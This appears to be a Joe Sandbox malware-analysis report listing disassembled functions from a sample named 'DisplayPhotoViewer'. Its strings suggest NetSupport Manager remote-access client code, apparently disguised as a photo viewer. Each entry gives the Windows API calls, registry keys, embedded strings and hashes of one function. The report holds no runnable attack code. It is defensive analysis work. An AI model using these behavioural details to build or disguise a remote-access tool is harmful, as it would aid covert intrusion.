                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                    • String ID: DISPLAYPHOTOVIEWER
                                                                                                    • API String ID: 2529650285-4210178995
                                                                                                    • Opcode ID: a36aeec8292e28b4d6fa9e931b8b9dfd306e8882dc1da4460dc61d5ecb7f935e
                                                                                                    • Instruction ID: 20e770adcf3bf3bc5ada956c1a830714f045b09d8597fdc4b668ee0269ba9269
                                                                                                    • Opcode Fuzzy Hash: a36aeec8292e28b4d6fa9e931b8b9dfd306e8882dc1da4460dc61d5ecb7f935e
                                                                                                    • Instruction Fuzzy Hash: 9D219530A5129C4FEB12CB348A447EAFBA19B8232CF0000D9DC868B285FA709984C3A1
                                                                                                    Function 11049860 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(00000000,00000001), ref: 110498AC
                                                                                                      • Part of subcall function 110359A0: wsprintfA.USER32 ref: 11035A0E
                                                                                                      • Part of subcall function 110359A0: SetDlgItemTextA.USER32(?,?,?), ref: 11035ADF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ItemKillTextTimerwsprintf
                                                                                                    • String ID: AckDlgTimeoutAccept$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1646146092-2249245707
                                                                                                    • Opcode ID: 7dc96b62a111e24c38fe96bdc37feb4b5347b5e25539e70e2d70022caea4a714
                                                                                                    • Instruction ID: 6e70745eb55afa015ec8191140cbf7c94f3762290eef46a85586a2895409f75f
                                                                                                    • Opcode Fuzzy Hash: 7dc96b62a111e24c38fe96bdc37feb4b5347b5e25539e70e2d70022caea4a714
                                                                                                    • Instruction Fuzzy Hash: 1811D639B0070AABE710DA69DC90F9A73D9EB88714F108439FA5597780EB71F841C761
                                                                                                    Function 11061450 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11061476
                                                                                                    • _memmove.LIBCMT ref: 110614C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProfileString_memmove
                                                                                                    • String ID: Device$No default printer,,LPT1:$Windows
                                                                                                    • API String ID: 1665476579-2460060945
                                                                                                    • Opcode ID: a80445cb8b0764cde8a56589affba30e2d6506b41358464581211ad7e7bc747c
                                                                                                    • Instruction ID: 997ed7acf0a8bd8c6630bc0b785afad6bbb3e6f6dd83aa9723dbfee9264657b9
                                                                                                    • Opcode Fuzzy Hash: a80445cb8b0764cde8a56589affba30e2d6506b41358464581211ad7e7bc747c
                                                                                                    • Instruction Fuzzy Hash: 82117835D0021AA6DB11CFA4DC85BFEBBACDF41308F140058EC865B244EE75660EC3B2
                                                                                                    Function 111556C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 111556F8
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11155739
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115575D
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1115578A
                                                                                                    Strings
                                                                                                    • CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32, xrefs: 111556EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                    • String ID: CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
                                                                                                    • API String ID: 1800380464-4062393554
                                                                                                    • Opcode ID: 84f327e6b75b548a7d9fe86136213cac0435364b0201bcb2ede9cd2a5e58427b
                                                                                                    • Instruction ID: 236d90f0b759a8580a44e9067a38d2d41aaaf05ec79b0a01a67f4502ef5b25ad
                                                                                                    • Opcode Fuzzy Hash: 84f327e6b75b548a7d9fe86136213cac0435364b0201bcb2ede9cd2a5e58427b
                                                                                                    • Instruction Fuzzy Hash: AE21847190012DEBCBA58F64DC85FDFFBB8EF06704F4041A9E919E2140DAB05A94CFA1
                                                                                                    Function 11139070 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113909E
                                                                                                    • _memmove.LIBCMT ref: 111390ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProfileString_memmove
                                                                                                    • String ID: ,,LPT1:$Device$Windows
                                                                                                    • API String ID: 1665476579-2967085602
                                                                                                    • Opcode ID: b0f5d679832389c680bed705195b68b271f2f9142042f2244acce39101443119
                                                                                                    • Instruction ID: 0db63d288a834b8e7c0b1b42fb5f101f760077cdfb46684da179e565062d31f1
                                                                                                    • Opcode Fuzzy Hash: b0f5d679832389c680bed705195b68b271f2f9142042f2244acce39101443119
                                                                                                    • Instruction Fuzzy Hash: B9113B7590024BAADF119F24AD45BFAF769EF85308F044068ED85A7245FA32670DC3B2
                                                                                                    Function 110C97B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __strdup.LIBCMT ref: 110C97E7
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcess__strdupwsprintf
                                                                                                    • String ID: *this==src$..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 3256405202-349135390
                                                                                                    • Opcode ID: 27c6eb7fd27d8d27b3a2ff34c75bb2e954ebe92b2c02cfbf43a67c72e0dd4b1d
                                                                                                    • Instruction ID: 2d4f70c5b9453de1285b66ba1ee7d3834edb01627b603a32f0ca469627614c4a
                                                                                                    • Opcode Fuzzy Hash: 27c6eb7fd27d8d27b3a2ff34c75bb2e954ebe92b2c02cfbf43a67c72e0dd4b1d
                                                                                                    • Instruction Fuzzy Hash: 28112579F00A07ABCB00DF29EC10F5EF7E9AF91A08B04C0A5E55897701F631B4058BC1
                                                                                                    Function 11129750 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1112975E
                                                                                                    Strings
                                                                                                    • DisableRunplugin, xrefs: 11129798
                                                                                                    • Shell_TrayWnd, xrefs: 11129759
                                                                                                    • Client, xrefs: 1112979D
                                                                                                    • Check9xLogon - [bLoggedIn: %u] send command %d to connections, xrefs: 111297D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FindWindow
                                                                                                    • String ID: Check9xLogon - [bLoggedIn: %u] send command %d to connections$Client$DisableRunplugin$Shell_TrayWnd
                                                                                                    • API String ID: 134000473-1587978603
                                                                                                    • Opcode ID: 38db118c5ed8e172d8d8045f3fd6efdb7c81d6174fa76497af954baf75e9ee07
                                                                                                    • Instruction ID: ffc561542de68da1f4aaa78ab69c10937e35579fb0a96ec00c588360ed09fd1b
                                                                                                    • Opcode Fuzzy Hash: 38db118c5ed8e172d8d8045f3fd6efdb7c81d6174fa76497af954baf75e9ee07
                                                                                                    • Instruction Fuzzy Hash: D4112974742639ABE7058EE9CE84BBEF765EB4038CF650038E8109A180FBB0A440CB91
                                                                                                    Function 1102B940 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(?,1102BE6D,00000000,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102B94C
                                                                                                    • InterlockedIncrement.KERNEL32(111E0FB4), ref: 1102B989
                                                                                                    • InterlockedDecrement.KERNEL32(111E0FB4), ref: 1102B9B0
                                                                                                    Strings
                                                                                                    • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102B996, 1102B9BC
                                                                                                    • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102B96F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$DecrementIncrementVersion
                                                                                                    • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                                    • API String ID: 1284810544-229394064
                                                                                                    • Opcode ID: cf29cf42e3b0eefbb8a643aabc0329f1d796e9c1334b561f15cc73702d8281a1
                                                                                                    • Instruction ID: 1eb963e0b6f14a46663ff2586e1c1ec39cc15301dd842ec930316428a2671cff
                                                                                                    • Opcode Fuzzy Hash: cf29cf42e3b0eefbb8a643aabc0329f1d796e9c1334b561f15cc73702d8281a1
                                                                                                    • Instruction Fuzzy Hash: C801493AF40E361BD6139BD66D08B99F799DF4432DF814062FE1992104E631A8008BF2
                                                                                                    Function 110BB350 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(00000000,NSMCobrMain,?), ref: 110BB365
                                                                                                    • LoadIconA.USER32(00000000,000032FA), ref: 110BB389
                                                                                                    • LoadCursorA.USER32(00000000,000019C8), ref: 110BB39D
                                                                                                    • RegisterClassA.USER32(?), ref: 110BB3D0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                    • String ID: NSMCobrMain
                                                                                                    • API String ID: 2883182437-2967143332
                                                                                                    • Opcode ID: ca51ce0da92f8865cf7b4a37de5a80f6b78405ba89655c2f8fd08a1d4c1e9234
                                                                                                    • Instruction ID: c91d1a4a3b93a440d5b578dd6a7d1bb8d6f3f4c651027d5d72633acd3798b9df
                                                                                                    • Opcode Fuzzy Hash: ca51ce0da92f8865cf7b4a37de5a80f6b78405ba89655c2f8fd08a1d4c1e9234
                                                                                                    • Instruction Fuzzy Hash: 9F015AB4D1122CABCF00DFE59849AEEFBB8AB48754F40416AE818B7240E77596409BE5
                                                                                                    Function 11153120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • BringWindowToTop.USER32(00000000), ref: 1115315C
                                                                                                    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,00000000,1102BF72,TermUI...), ref: 11153175
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Bring
                                                                                                    • String ID: MMPlayer$MMPlayerOnTop
                                                                                                    • API String ID: 3868984299-4271085576
                                                                                                    • Opcode ID: af7856b2b848aac60008f449ae5680050ef8d2bde6db30b0cae771afdcea954e
                                                                                                    • Instruction ID: a7937f5bea9856c3ffd92c25fff6ad54493ea88870c2ae74a5311f1dc99a0817
                                                                                                    • Opcode Fuzzy Hash: af7856b2b848aac60008f449ae5680050ef8d2bde6db30b0cae771afdcea954e
                                                                                                    • Instruction Fuzzy Hash: 0F014F34394300BBE7718BB4CD96F96B2A0AB48B11F200A18F776AB2C0C6F4B000CB18
                                                                                                    Function 1113B810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B690: _memset.LIBCMT ref: 1113B6D5
                                                                                                      • Part of subcall function 1113B690: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
                                                                                                      • Part of subcall function 1113B690: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
                                                                                                      • Part of subcall function 1113B690: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
                                                                                                      • Part of subcall function 1113B690: FreeLibrary.KERNEL32(00000000), ref: 1113B73F
                                                                                                      • Part of subcall function 1113B690: GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
                                                                                                    • GetSysColor.USER32(0000000F), ref: 1113B829
                                                                                                    • LoadBitmapA.USER32(00000000,00000000), ref: 1113B83F
                                                                                                    • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 1113B87B
                                                                                                    Strings
                                                                                                    • hGrip || !"Unable to load sizing grip bitmap", xrefs: 1113B85E
                                                                                                    • ..\ctl32\util.cpp, xrefs: 1113B859
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
                                                                                                    • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                                                    • API String ID: 1044520585-3315463184
                                                                                                    • Opcode ID: c4d1d12b1b57996beddbbd3ea187c1ef115eee2bbae2384f7023241703387bcc
                                                                                                    • Instruction ID: d3ec676b8e14f3829fbdc54e3ae0169b2bbd10960b91061ef2a2ed8224b076af
                                                                                                    • Opcode Fuzzy Hash: c4d1d12b1b57996beddbbd3ea187c1ef115eee2bbae2384f7023241703387bcc
                                                                                                    • Instruction Fuzzy Hash: 45F0BB79B5022537D25156E1AC05FEBBB5C5B40B7AF004070FE18A71C5DD74A94093E5
                                                                                                    Function 1113B7C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
